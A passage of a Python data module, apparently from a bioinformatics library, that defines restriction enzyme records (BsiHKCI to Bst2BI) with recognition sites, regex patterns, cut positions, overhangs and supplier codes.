'charac': (1, -1, None, None, 'CYCGRG'),
'compsite': '(?=(?P<BsiHKCI>C[CT]CG[AG]G))',
'dna': None,
'freq': 1024.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'YCGR',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CYCGRG',
'size': 6,
'substrat': 'DNA',
'suppl': ('Q', 'X'),
}
rest_dict['BsiHKCI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CACGAG'),
'compsite': '(?=(?P<BsiI>CACGAG))|(?=(?P<BsiI_as>CTCGTG))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'ACGA',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CACGAG',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['BsiI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CCGG'),
'compsite': '(?=(?P<BsiSI>CCGG))',
'dna': None,
'freq': 256.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -2,
'ovhgseq': 'CG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCGG',
'size': 4,
'substrat': 'DNA',
'suppl': ('C', 'Y'),
}
rest_dict['BsiSI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CGTACG'),
'compsite': '(?=(?P<BsiWI>CGTACG))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'GTAC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CGTACG',
'size': 6,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['BsiWI'] = _temp()
def _temp():
return {
'charac': (7, -7, None, None, 'CCNNNNNNNGG'),
'compsite': '(?=(?P<BsiYI>CC.......GG))',
'dna': None,
'freq': 256.0,
'fst3': -7,
'fst5': 7,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 3,
'ovhgseq': 'NNN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCNNNNNNNGG',
'size': 11,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['BsiYI'] = _temp()
def _temp():
return {
'charac': (15, 14, None, None, 'GGGAC'),
'compsite': '(?=(?P<BslFI>GGGAC))|(?=(?P<BslFI_as>GTCCC))',
'dna': None,
'freq': 1024.0,
'fst3': 14,
'fst5': 15,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'NNNN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGGAC',
'size': 5,
'substrat': 'DNA',
'suppl': ('I',),
}
rest_dict['BslFI'] = _temp()
def _temp():
return {
'charac': (7, -7, None, None, 'CCNNNNNNNGG'),
'compsite': '(?=(?P<BslI>CC.......GG))',
'dna': None,
'freq': 256.0,
'fst3': -7,
'fst5': 7,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 3,
'ovhgseq': 'NNN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCNNNNNNNGG',
'size': 11,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['BslI'] = _temp()
def _temp():
return {
'charac': (6, 5, None, None, 'GTCTC'),
'compsite': '(?=(?P<BsmAI>GTCTC))|(?=(?P<BsmAI_as>GAGAC))',
'dna': None,
'freq': 1024.0,
'fst3': 5,
'fst5': 6,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'NNNN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GTCTC',
'size': 5,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['BsmAI'] = _temp()
def _temp():
return {
'charac': (7, 5, None, None, 'CGTCTC'),
'compsite': '(?=(?P<BsmBI>CGTCTC))|(?=(?P<BsmBI_as>GAGACG))',
'dna': None,
'freq': 4096.0,
'fst3': 5,
'fst5': 7,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'NNNN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CGTCTC',
'size': 6,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['BsmBI'] = _temp()
def _temp():
return {
'charac': (15, 14, None, None, 'GGGAC'),
'compsite': '(?=(?P<BsmFI>GGGAC))|(?=(?P<BsmFI_as>GTCCC))',
'dna': None,
'freq': 1024.0,
'fst3': 14,
'fst5': 15,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'NNNN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGGAC',
'size': 5,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['BsmFI'] = _temp()
def _temp():
return {
'charac': (7, -1, None, None, 'GAATGC'),
'compsite': '(?=(?P<BsmI>GAATGC))|(?=(?P<BsmI_as>GCATTC))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 7,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'CN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GAATGC',
'size': 6,
'substrat': 'DNA',
'suppl': ('J', 'M', 'N', 'S'),
}
rest_dict['BsmI'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'GGCC'),
'compsite': '(?=(?P<BsnI>GGCC))',
'dna': None,
'freq': 256.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGCC',
'size': 4,
'substrat': 'DNA',
'suppl': ('V',),
}
rest_dict['BsnI'] = _temp()
def _temp():
return {
'charac': (7, 5, None, None, 'GGTCTC'),
'compsite': '(?=(?P<Bso31I>GGTCTC))|(?=(?P<Bso31I_as>GAGACC))',
'dna': None,
'freq': 4096.0,
'fst3': 5,
'fst5': 7,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'NNNN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGTCTC',
'size': 6,
'substrat': 'DNA',
'suppl': ('I', 'V'),
}
rest_dict['Bso31I'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CYCGRG'),
'compsite': '(?=(?P<BsoBI>C[CT]CG[AG]G))',
'dna': None,
'freq': 1024.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'YCGR',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CYCGRG',
'size': 6,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['BsoBI'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'TTCGAA'),
'compsite': '(?=(?P<Bsp119I>TTCGAA))',
'dna': None,
'freq': 4096.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -2,
'ovhgseq': 'CG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'TTCGAA',
'size': 6,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['Bsp119I'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'GGGCCC'),
'compsite': '(?=(?P<Bsp120I>GGGCCC))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'GGCC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGGCCC',
'size': 6,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['Bsp120I'] = _temp()
def _temp():
return {
'charac': (5, -5, None, None, 'GDGCHC'),
'compsite': '(?=(?P<Bsp1286I>G[AGT]GC[ACT]C))',
'dna': None,
'freq': 455.1111111111111,
'fst3': -5,
'fst5': 5,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 4,
'ovhgseq': 'DGCH',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GDGCHC',
'size': 6,
'substrat': 'DNA',
'suppl': ('J', 'K', 'N'),
}
rest_dict['Bsp1286I'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'TCCGGA'),
'compsite': '(?=(?P<Bsp13I>TCCGGA))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'CCGG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'TCCGGA',
'size': 6,
'substrat': 'DNA',
'suppl': ('I', 'V'),
}
rest_dict['Bsp13I'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'TGTACA'),
'compsite': '(?=(?P<Bsp1407I>TGTACA))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'GTAC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'TGTACA',
'size': 6,
'substrat': 'DNA',
'suppl': ('B', 'K'),
}
rest_dict['Bsp1407I'] = _temp()
def _temp():
return {
'charac': (0, 0, None, None, 'GATC'),
'compsite': '(?=(?P<Bsp143I>GATC))',
'dna': None,
'freq': 256.0,
'fst3': 0,
'fst5': 0,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'GATC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GATC',
'size': 4,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['Bsp143I'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'GCTNAGC'),
'compsite': '(?=(?P<Bsp1720I>GCT.AGC))',
'dna': None,
'freq': 4096.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -3,
'ovhgseq': 'TNA',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCTNAGC',
'size': 7,
'substrat': 'DNA',
'suppl': ('I', 'V'),
}
rest_dict['Bsp1720I'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CCATGG'),
'compsite': '(?=(?P<Bsp19I>CCATGG))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'CATG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCATGG',
'size': 6,
'substrat': 'DNA',
'suppl': ('I', 'V'),
}
rest_dict['Bsp19I'] = _temp()
def _temp():
return {
'charac': (-8, -25, 24, 7, 'GACNNNNNNTGG'),
'compsite': '(?=(?P<Bsp24I>GAC......TGG))|(?=(?P<Bsp24I_as>CCA......GTC))',
'dna': None,
'freq': 4096.0,
'fst3': -25,
'fst5': -8,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 5,
'ovhgseq': 'NNNNN',
'results': None,
'scd3': 7,
'scd5': 24,
'site': 'GACNNNNNNTGG',
'size': 12,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Bsp24I'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'CCGCAT'),
'compsite': '(?=(?P<Bsp3004IV>CCGCAT))|(?=(?P<Bsp3004IV_as>ATGCGG))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCGCAT',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Bsp3004IV'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'CGCGCAG'),
'compsite': '(?=(?P<Bsp460III>CGCGCAG))|(?=(?P<Bsp460III_as>CTGCGCG))',
'dna': None,
'freq': 16384.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'CGCGCAG',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Bsp460III'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'TCGCGA'),
'compsite': '(?=(?P<Bsp68I>TCGCGA))',
'dna': None,
'freq': 4096.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'TCGCGA',
'size': 6,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['Bsp68I'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CCGC'),
'compsite': '(?=(?P<BspACI>CCGC))|(?=(?P<BspACI_as>GCGG))',
'dna': None,
'freq': 256.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -2,
'ovhgseq': 'CG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCGC',
'size': 4,
'substrat': 'DNA',
'suppl': ('I',),
}
rest_dict['BspACI'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'GGCC'),
'compsite': '(?=(?P<BspANI>GGCC))',
'dna': None,
'freq': 256.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGCC',
'size': 4,
'substrat': 'DNA',
'suppl': ('X',),
}
rest_dict['BspANI'] = _temp()
def _temp():
return {
'charac': (14, 7, None, None, 'CTCAG'),
'compsite': '(?=(?P<BspCNI>CTCAG))|(?=(?P<BspCNI_as>CTGAG))',
'dna': None,
'freq': 1024.0,
'fst3': 7,
'fst5': 14,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'NN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CTCAG',
'size': 5,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['BspCNI'] = _temp()
def _temp():
return {
'charac': (9, 6, None, None, 'GAGTC'),
'compsite': '(?=(?P<BspD6I>GAGTC))|(?=(?P<BspD6I_as>GACTC))',
'dna': None,
'freq': 1024.0,
'fst3': 6,
'fst5': 9,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -2,
'ovhgseq': 'NN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GAGTC',
'size': 5,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['BspD6I'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'ATCGAT'),
'compsite': '(?=(?P<BspDI>ATCGAT))',
'dna': None,
'freq': 4096.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -2,
'ovhgseq': 'CG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'ATCGAT',
'size': 6,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['BspDI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'TCCGGA'),
'compsite': '(?=(?P<BspEI>TCCGGA))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'CCGG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'TCCGGA',
'size': 6,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['BspEI'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'CGCG'),
'compsite': '(?=(?P<BspFNI>CGCG))',
'dna': None,
'freq': 256.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CGCG',
'size': 4,
'substrat': 'DNA',
'suppl': ('I',),
}
rest_dict['BspFNI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'CTGGAC'),
'compsite': '(?=(?P<BspGI>CTGGAC))|(?=(?P<BspGI_as>GTCCAG))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'CTGGAC',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['BspGI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'TCATGA'),
'compsite': '(?=(?P<BspHI>TCATGA))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'CATG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'TCATGA',
'size': 6,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['BspHI'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'GGNNCC'),
'compsite': '(?=(?P<BspLI>GG..CC))',
'dna': None,
'freq': 256.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGNNCC',
'size': 6,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['BspLI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'ACATGT'),
'compsite': '(?=(?P<BspLU11I>ACATGT))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'CATG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'ACATGT',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['BspLU11I'] = _temp()
def _temp():
return {
'charac': (5, -5, None, None, 'CTGCAG'),
'compsite': '(?=(?P<BspMAI>CTGCAG))',
'dna': None,
'freq': 4096.0,
'fst3': -5,
'fst5': 5,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 4,
'ovhgseq': 'TGCA',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CTGCAG',
'size': 6,
'substrat': 'DNA',
'suppl': ('X',),
}
rest_dict['BspMAI'] = _temp()
def _temp():
return {
'charac': (10, 8, None, None, 'ACCTGC'),
'compsite': '(?=(?P<BspMI>ACCTGC))|(?=(?P<BspMI_as>GCAGGT))',
'dna': None,
'freq': 4096.0,
'fst3': 8,
'fst5': 10,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'NNNN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'ACCTGC',
'size': 6,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['BspMI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'TCCGGA'),
'compsite': '(?=(?P<BspMII>TCCGGA))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'CCGG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'TCCGGA',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['BspMII'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'CCAGA'),
'compsite': '(?=(?P<BspNCI>CCAGA))|(?=(?P<BspNCI_as>TCTGG))',
'dna': None,
'freq': 1024.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCAGA',
'size': 5,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['BspNCI'] = _temp()
def _temp():
return {
'charac': (5, -5, None, None, 'GCTAGC'),
'compsite': '(?=(?P<BspOI>GCTAGC))',
'dna': None,
'freq': 4096.0,
'fst3': -5,
'fst5': 5,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 4,
'ovhgseq': 'CTAG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCTAGC',
'size': 6,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['BspOI'] = _temp()
def _temp():
return {
'charac': (9, 5, None, None, 'GGATC'),
'compsite': '(?=(?P<BspPI>GGATC))|(?=(?P<BspPI_as>GATCC))',
'dna': None,
'freq': 1024.0,
'fst3': 5,
'fst5': 9,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -1,
'ovhgseq': 'N',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGATC',
'size': 5,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['BspPI'] = _temp()
def _temp():
return {
'charac': (8, 4, None, None, 'GCTCTTC'),
'compsite': '(?=(?P<BspQI>GCTCTTC))|(?=(?P<BspQI_as>GAAGAGC))',
'dna': None,
'freq': 16384.0,
'fst3': 4,
'fst5': 8,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -3,
'ovhgseq': 'NNN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCTCTTC',
'size': 7,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['BspQI'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'TTCGAA'),
'compsite': '(?=(?P<BspT104I>TTCGAA))',
'dna': None,
'freq': 4096.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -2,
'ovhgseq': 'CG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'TTCGAA',
'size': 6,
'substrat': 'DNA',
'suppl': ('K',),
}
rest_dict['BspT104I'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'GGYRCC'),
'compsite': '(?=(?P<BspT107I>GG[CT][AG]CC))',
'dna': None,
'freq': 1024.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'GYRC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGYRCC',
'size': 6,
'substrat': 'DNA',
'suppl': ('K',),
}
rest_dict['BspT107I'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CTTAAG'),
'compsite': '(?=(?P<BspTI>CTTAAG))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'TTAA',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CTTAAG',
'size': 6,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['BspTI'] = _temp()
def _temp():
return {
'charac': (7, 5, None, None, 'GGTCTC'),
'compsite': '(?=(?P<BspTNI>GGTCTC))|(?=(?P<BspTNI_as>GAGACC))',
'dna': None,
'freq': 4096.0,
'fst3': 5,
'fst5': 7,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'NNNN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGTCTC',
'size': 6,
'substrat': 'DNA',
'suppl': ('X',),
}
rest_dict['BspTNI'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'CCGCTC'),
'compsite': '(?=(?P<BsrBI>CCGCTC))|(?=(?P<BsrBI_as>GAGCGG))',
'dna': None,
'freq': 4096.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCGCTC',
'size': 6,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['BsrBI'] = _temp()
def _temp():
return {
'charac': (8, 0, None, None, 'GCAATG'),
'compsite': '(?=(?P<BsrDI>GCAATG))|(?=(?P<BsrDI_as>CATTGC))',
'dna': None,
'freq': 4096.0,
'fst3': 0,
'fst5': 8,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'NN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCAATG',
'size': 6,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['BsrDI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'RCCGGY'),
'compsite': '(?=(?P<BsrFI>[AG]CCGG[CT]))',
'dna': None,
'freq': 1024.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'CCGG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'RCCGGY',
'size': 6,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['BsrFI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'TGTACA'),
'compsite': '(?=(?P<BsrGI>TGTACA))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'GTAC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'TGTACA',
'size': 6,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['BsrGI'] = _temp()
def _temp():
return {
'charac': (6, -1, None, None, 'ACTGG'),
'compsite': '(?=(?P<BsrI>ACTGG))|(?=(?P<BsrI_as>CCAGT))',
'dna': None,
'freq': 1024.0,
'fst3': -1,
'fst5': 6,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'GN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'ACTGG',
'size': 5,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['BsrI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'RCCGGY'),
'compsite': '(?=(?P<BssAI>[AG]CCGG[CT]))',
'dna': None,
'freq': 1024.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'CCGG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'RCCGGY',
'size': 6,
'substrat': 'DNA',
'suppl': ('C',),
}
rest_dict['BssAI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CCNNGG'),
'compsite': '(?=(?P<BssECI>CC..GG))',
'dna': None,
'freq': 256.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'CNNG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCNNGG',
'size': 6,
'substrat': 'DNA',
'suppl': ('I',),
}
rest_dict['BssECI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'GCGCGC'),
'compsite': '(?=(?P<BssHII>GCGCGC))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'CGCG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCGCGC',
'size': 6,
'substrat': 'DNA',
'suppl': ('J', 'K', 'M', 'N', 'Q', 'R', 'X'),
}
rest_dict['BssHII'] = _temp()
def _temp():
return {
'charac': (0, 0, None, None, 'GATC'),
'compsite': '(?=(?P<BssMI>GATC))',
'dna': None,
'freq': 256.0,
'fst3': 0,
'fst5': 0,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'GATC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GATC',
'size': 4,
'substrat': 'DNA',
'suppl': ('V',),
}
rest_dict['BssMI'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'GTATAC'),
'compsite': '(?=(?P<BssNAI>GTATAC))',
'dna': None,
'freq': 4096.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GTATAC',
'size': 6,
'substrat': 'DNA',
'suppl': ('I', 'V'),
}
rest_dict['BssNAI'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'GRCGYC'),
'compsite': '(?=(?P<BssNI>G[AG]CG[CT]C))',
'dna': None,
'freq': 1024.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -2,
'ovhgseq': 'CG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GRCGYC',
'size': 6,
'substrat': 'DNA',
'suppl': ('V',),
}
rest_dict['BssNI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CACGAG'),
'compsite': '(?=(?P<BssSI>CACGAG))|(?=(?P<BssSI_as>CTCGTG))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'ACGA',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CACGAG',
'size': 6,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['BssSI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CCWWGG'),
'compsite': '(?=(?P<BssT1I>CC[AT][AT]GG))',
'dna': None,
'freq': 1024.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'CWWG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCWWGG',
'size': 6,
'substrat': 'DNA',
'suppl': ('I', 'V'),
}
rest_dict['BssT1I'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'GTATAC'),
'compsite': '(?=(?P<Bst1107I>GTATAC))',
'dna': None,
'freq': 4096.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GTATAC',
'size': 6,
'substrat': 'DNA',
'suppl': ('B', 'K'),
}
rest_dict['Bst1107I'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CACGAG'),
'compsite': '(?=(?P<Bst2BI>CACGAG))|(?=(?P<Bst2BI_as>CTCGTG))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'ACGA',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CACGAG',
